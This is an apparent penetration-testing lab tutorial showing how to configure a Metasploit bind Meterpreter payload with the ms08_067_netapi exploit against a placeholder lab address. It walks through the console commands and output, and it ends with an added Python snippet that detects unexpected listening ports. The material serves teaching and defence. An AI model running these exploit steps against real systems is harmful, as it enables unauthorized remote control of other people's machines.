Use a Bind Shell Payload in Metasploit

Introduction

In this lab, you will learn the fundamental steps of using a bind shell payload in the Metasploit Framework. Metasploit is a powerful penetration testing tool that allows security professionals to find, exploit, and validate vulnerabilities.

A "payload" in Metasploit is the code that runs on the target system after a vulnerability has been successfully exploited. A "bind shell" payload is a specific type that opens a listening port on the target machine. The attacker then connects to this port to gain a command shell and control the system. This is different from a "reverse shell," where the target machine initiates a connection back to the attacker.

Throughout this lab, you will practice the complete workflow: launching Metasploit, selecting an exploit, configuring a bind shell payload with the necessary options, and attempting to run the exploit.

Select an exploit module for a target

In this step, you will start the Metasploit Framework console and select an exploit module. An exploit is a piece of code that takes advantage of a specific vulnerability in a system. For this lab, we will use a well-known exploit for demonstration purposes.

First, open your terminal and launch the Metasploit console. We'll use the -q flag for "quiet" mode to skip the banner and start faster.

msfconsole -q

Once the console loads, your prompt will change to msf6 >. Now, you need to select an exploit. We will use the ms08_067_netapi exploit, which targets a vulnerability in the Windows Server service.

Use the use command to load the exploit module:

use exploit/windows/smb/ms08_067_netapi

After running the command, you will see your prompt change to reflect the currently active exploit module.

msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) >

Notice that Metasploit defaulted to a reverse_tcp payload. We will change this in the next step.

Set the payload to windows/meterpreter/bind_tcp

In this step, you will change the default payload to a bind shell payload. As mentioned in the introduction, a bind payload will open a port on the target system, waiting for the attacker to connect.

We will use windows/meterpreter/bind_tcp. Instead of a plain command shell, this payload gives you a Meterpreter session, an advanced, feature-rich payload that provides more control over the target system.

Inside the msfconsole prompt, use the set payload command to specify the new payload:

set payload windows/meterpreter/bind_tcp

Metasploit will confirm the change.

msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp

You have now successfully configured the exploit to use a bind Meterpreter payload.

Set the RHOSTS option for the exploit

In this step, you need to specify the target of your exploit. In Metasploit, the target address is set using the RHOSTS (Remote Hosts) option.

You must tell Metasploit which machine to attack. In a real-world scenario, you would have discovered the IP address of a vulnerable machine through reconnaissance. For this lab, we will use a placeholder IP address.

Use the set command to configure the RHOSTS option. Let's set it to 172.17.0.2, which is a common IP address for a container on a Docker bridge network.

set RHOSTS 172.17.0.2

The console will confirm that the RHOSTS option has been set.

msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 172.17.0.2
RHOSTS => 172.17.0.2

Now Metasploit knows where to send the exploit.

Set the LPORT option for the payload on the target

In this step, you will configure the listening port for the bind shell. With a bind payload, the LPORT (Local Port) option specifies the TCP port that the payload will open on the target machine. This is a crucial concept: you are defining the port you will connect to after the exploit succeeds.

We will use the common port 4444 for this purpose.

Use the set command to configure the LPORT option:

set LPORT 4444

The console will confirm the setting.

msf6 exploit(windows/smb/ms08_067_netapi) > set LPORT 4444
LPORT => 4444

To be sure all our options are set correctly, you can use the show options command to review the configuration for both the exploit and the payload.

show options

You should see an output table where RHOSTS and LPORT are correctly set with the values you provided.

...
Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     172.17.0.2       no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
...

Run the exploit and connect to the listening port

In this step, with all options configured, you will launch the attack. The exploit command (or its alias, run) tells Metasploit to send the exploit and payload to the target.

Now, run the exploit:

exploit

Important Note: In this lab environment, there is no vulnerable Windows machine at the 172.17.0.2 address. Therefore, the exploit will fail. The purpose of this step is to understand the command and observe the process. In a real penetration test, if the target were vulnerable, this command would create a session.

You will see Metasploit attempt to connect, but it will eventually time out. The output will look something like this:

msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started bind TCP handler against 172.17.0.2:4444
[*] 172.17.0.2:445 - Automatically detecting the target...
[*] 172.17.0.2:445 - Fingerprint: Unknown
[-] 172.17.0.2:445 - The target is not exploitable.
[*] Exploit completed, but no session was created.

This output is expected. It confirms that Metasploit ran the exploit, but no session was established because the target was not vulnerable or reachable. You have successfully completed the workflow for using a bind shell payload.

To exit the Metasploit console, type exit:

exit

Summary

In this lab, you have learned the essential process of configuring and using a bind shell payload within the Metasploit Framework.

You practiced the core workflow:

  1. Starting the Metasploit console (msfconsole).
  2. Selecting an exploit module with the use command.
  3. Setting a specific payload with set payload.
  4. Configuring target-specific options like RHOSTS (the target's IP) and LPORT (the listening port on the target).
  5. Executing the attack with the exploit command.

Most importantly, you now understand the key characteristic of a bind shell: it opens a listener on the target system, requiring the attacker to connect to it. This foundational knowledge is critical for conducting penetration tests and understanding different methods of gaining remote access.
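
Because a bind payload opens a listener on the target, it shows up in that host's socket table. The following is an added example, not part of the original lab: it parses `netstat -ano` output and reports remotely reachable TCP listeners whose port is outside an expected baseline. The sample output, the PIDs, the baseline set and the function name are constructed assumptions; port 4444 and 172.17.0.2 are the lab's values.

```python
import re

# Constructed sample of `netstat -ano` output from a Windows host (not real data).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       2316
  TCP    127.0.0.1:5357         0.0.0.0:0              LISTENING       1200
  TCP    172.17.0.2:445         172.17.0.1:51322       ESTABLISHED     4
  TCP    [::]:445               [::]:0                 LISTENING       4
  UDP    0.0.0.0:5355           *:*                                    1432
"""

# Assumed baseline: ports this host is expected to listen on.
BASELINE_PORTS = {135, 445}

# Matches only TCP rows in the LISTENING state; captures address, port and PID.
LINE_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")
LOOPBACK_PREFIXES = ("127.", "[::1]")


def find_unexpected_listeners(netstat_text, baseline_ports):
    """Return sorted (address, port, pid) tuples for network-reachable
    TCP listeners whose port is not in the baseline."""
    findings = set()
    for line in netstat_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # header, UDP row, or a non-listening connection
        addr, port, pid = match.group(1), int(match.group(2)), int(match.group(3))
        if addr.startswith(LOOPBACK_PREFIXES):
            continue  # loopback-only listeners cannot be reached remotely
        if port not in baseline_ports:
            findings.add((addr, port, pid))
    return sorted(findings)


if __name__ == "__main__":
    for addr, port, pid in find_unexpected_listeners(SAMPLE_NETSTAT, BASELINE_PORTS):
        print(f"unexpected listener {addr}:{port} (PID {pid})")
```

The PID column lets you map a flagged listener back to its owning process for triage.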